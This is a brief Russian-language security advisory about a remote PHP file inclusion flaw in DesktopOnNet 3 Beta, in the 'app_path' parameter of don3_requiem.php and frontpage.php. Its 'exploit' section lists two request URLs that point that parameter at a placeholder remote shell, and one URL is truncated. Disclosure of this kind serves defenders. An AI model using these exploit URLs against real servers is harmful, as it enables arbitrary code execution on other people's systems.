Программа: DesktopOnNet 3 Beta
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «app_path» сценариями don3_requiem.php и frontpage.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Эксплоит:
http://127.0.0.1/DON3/applications/d...quiem.don3app/ don3_requiem.php?app_path=SH3LL?
http://127.0.0.1/DON3/applications/frontpage. don3app/frontpage.php?app_path=SH3LL?